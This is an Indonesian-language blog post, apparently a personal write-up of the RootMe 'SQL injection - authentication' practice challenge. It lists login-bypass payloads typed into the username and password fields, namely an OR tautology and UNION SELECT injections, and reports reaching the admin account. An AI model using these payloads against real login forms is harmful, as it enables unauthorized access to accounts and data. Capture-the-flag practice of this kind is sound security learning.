Thursday, December 27, 2018

[RootMe] SQL injection - authentication

disoal ini saya disuruh untuk menemukan password admin, ketika saya coba dengan SQL INJECTION login ternyata berhasil tapi itu user admin.

lalu saya coba menggunakan SQL UNION ternyata vuln, jadi saya coba teknik tersebut:
username: 1' OR '1
password:  1' OR '1' UNION SELECT 1,2-- 
lalu login maka berhasil, selanjutnya melihat databasenya:
username: 1' OR '1
password: 1' OR '1' UNION SELECT database(),2-- 
njir ternyata error, lalu saya coba ganti database() menjadi string, seperti ini:
username: 1' OR '1
password:  1' OR '1' UNION SELECT "dekguh",2-- 
ternyata berhasil :D masuk ke admin.
Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)